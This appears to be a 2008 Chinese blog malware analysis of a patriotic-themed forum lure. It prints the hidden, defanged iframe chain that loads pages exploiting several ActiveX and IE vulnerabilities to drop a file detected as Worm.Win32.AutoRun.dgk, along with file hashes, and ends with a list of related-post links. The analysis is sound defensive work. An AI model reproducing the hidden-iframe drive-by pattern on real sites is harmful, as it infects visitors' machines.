小心利用大家的爱国热情来传播Worm.Win32.AutoRun.dgk的网页
小心利用大家的爱国热情来传播Worm.Win32.AutoRun.dgk的网页
endurer原创
2008-05-05 第1版
在某论坛上看到一个题为“爱国的都进来”的贴子,里面的内容是要求大家点击链接hxxp://2008qq.***8q*s*o**so*.cn/?QQ=2008-28225&id=294444559001
以表示自己的爱国热情。
#1 hxxp://2008qq.***8q*s*o**so*.cn/?QQ=2008-28225&id=294444559001 包含代码:
/---
<ifame src=hxxp://*t*t*t.d**jp*ao.net/t7.htm width=50 height=0></iframe>
---/
#1.1 hxxp://*t*t*t.d**jp*ao.net/t7.htm 输出代码:
/---
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/14.htm></iframe>
<ifame width=10 height=0 src=hxxp://*t*t*t.d**jp*ao.net/new.htm></iframe>
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/lz.htm></iframe>
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/bf.htm></iframe>
<ifame width=10 height=0 src=hxxp://*t*t*t.d**jp*ao.net/qq.htm></iframe>
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/xl.htm></iframe>
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/Baidu.htm></iframe>
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/rl.htm></iframe>
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/04.htm></iframe>
---/
#1.1.1 hxxp://*t*t*t.d**jp*ao.net/14.htm
利用 MS06-014漏洞(clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)下载 hxxp://*t*t*t.d**jp*ao.net/css.css
文件说明符 : D:/test/css.css
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-5-4 20:50:27
修改时间 : 2008-5-4 20:50:27
大小 : 25808 字节 25.208 KB
MD5 : dfef794a11825c2c862cec2e303983ba
SHA1: F707C17E58A6A16578DFE523DDE30408585BD93A
CRC32: 0fcf8388
css.css是一个EXE文件,卡巴斯基报为 Worm.Win32.AutoRun.dgk [KLAB-4890418]
#1.1.2 hxxp://*t*t*t.d**jp*ao.net/new.htm(瑞星报为:Trojan.DL.Script.JS.Agent.mej)
利用RealPlayer(IERPCtl.IERPCtl.1,clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.3 hxxp://*t*t*t.d**jp*ao.net/lz.htm
利用联众(GLCHAT.GLChatCtrl.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.4 hxxp://*t*t*t.d**jp*ao.net/bf.htm
利用暴风影音(MPS.StormPlayer.1,clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.5 hxxp://*t*t*t.d**jp*ao.net/qq.htm
利用QQ(QvodInsert.QvodCtrl.1,clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.6 hxxp://*t*t*t.d**jp*ao.net/xl.htm
利用迅雷(DPClient.Vod,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.7 hxxp://*t*t*t.d**jp*ao.net/Baidu.htm
利用BaiDu(BaiduBar.Tool.1,clsid:{A7F05EE4-0426ID:-454F-8013-C41E3596E9E9})下载hxxp://91wwmm.com/Baidu.cab, 内含 Baidu.exe
#1.1.8 hxxp://*t*t*t.d**jp*ao.net/rl.htm
利用RealPlayer漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.9 hxxp://*t*t*t.d**jp*ao.net/04.htm
利用Microsoft IE畸形VML文档处理缓冲区溢出漏洞(clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
小心利用大家的爱国热情来传播Worm.Win32.AutoRun.dgk的网页相关推荐
- 一个传播 Worm.Win32.Otwycal.c / Worm.Win32.Infei.a 的网站v2
一个传播 Worm.Win32.Otwycal.c / Worm.Win32.Infei.a 的网站 endurer 原创 2008-04-07 第2版 补充瑞星的回复 ...
- 传播Virus.Win32.AutoRun.f/Worm.Win32.Delf.b的网页
endurer 原创 2007-06-15 第1版 一位网友说他的电脑不管打开什么网站的网页,显示的都是hxxp://218.*1*.1*4.170的VIP1.HTM.VIP2.HTM等. hxxp: ...
- 小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
endurer 原创 2007-03-17 第1版 QQ收到信息: /--- 她寂寞,她孤独,她讨厌男人,她需要男人,请点击 hxxp://www.b**b**a*imm.info与她视频点对点做爱! ...
- 黑客正利用“Black Lives Matter”政治口号传播恶意软件
安全机构 abuse.ch最近发现了一个恶意软件传播活动,该活动正在利用"Black Lives Matter"政治口号传播僵尸恶意软件. 黑客故意让电子邮件的标题简短客观,从而有 ...
- 小心通过QQ尾巴中的网址(Q-Zone qq C0M)传播的Worm Win32 Viking r
endurer 原创 2006-08-01 第1版 一个网友的电脑中了QQ尾巴,打开QQ好友的对话框就会自动发出如下信息: --------------------------------- 麻烦帮我 ...
- 某夏露官方网传播 RootKit.Win32.RESSDT.o/Trojan-Downloader.Win32.Agent.mjp
某夏露官方网传播 RootKit.Win32.RESSDT.o/Trojan-Downloader.Win32.Agent.mjp endurer 原创 2008-04-09 第1版 该网站首页 包含 ...
- 【源码】利用惠更斯-菲涅耳原理模拟一维光场传播
这段代码可以为您提供如何计算从近场到远场的光场传播.此外,还将一些常见的光学问题如单狭缝和双狭缝来模拟传播场,并将这些结果与光学教科书进行比较. This code can provide you w ...
- 利用img请求一个html页面,爬虫学习笔记——爬取单个网页里的所有图片(入门)...
最近闲着,想学一下爬虫 (^-^)V --[手动比耶]先从简单的练习开始吧~ 爬取单个网页里的所有图片,这个没有什么难点,因为不需要翻页哈哈哈哈. 我很喜欢一些文章中的配图,比如这篇,里面就会有很多电 ...
- python利用有道词典翻译_使用Python从有道词典网页获取单词翻译
从有道词典网页获取某单词的中文解释. import re import urllib word=raw_input('input a word\n') url='http://dict.youdao. ...
- 利用python实现微信自动回复群发等操作(不需要登录网页版微信)
目前微信网页版限制登录,wxpy等模块操作微信的手段都无法使用了,前阵时间发现了WechatPCAPI这个模块,通过dll注入的手段实现操作微信,下面分享一下该模块的使用方法. 运行环境 Wechat ...
最新文章
- java后门_@Java Web 程序员,我们一起给程序开个后门吧:让你在保留现场,服务不重启的情况下,执行我们的调试代码...
- sysbench 性能测试
- Z 字形变换 C++实现 java实现 leetcode系列(六)
- 解析XML方式-DOM,SAX
- Android退出程序(一)——单例模式
- 【Redis】解析Redis和Java传递数据
- 一步一步写算法(之哈夫曼树 上)
- 20200227:存在重复元素Ⅱ(leetcode219)
- 循环遍历java属性_java中循环遍历实体类的属性和数据类型以及属性值
- Android iw 使用方法
- 句子匹配 无监督_在无监督的情况下创建可解释的句子表示形式
- 最新服装零售软件管理排名
- 【Python】网络爬虫
- Fibonacci Heaps
- 物理量与单位符号的书写标准
- UOJ【UR #12】实验室外的攻防战 题解
- B端和C端产品主要差异:用户、体验、数据
- 自旋电子器件 —— 概念
- Coggle推荐系统学习任务1:推荐系统基础
- vue:高德地图的使用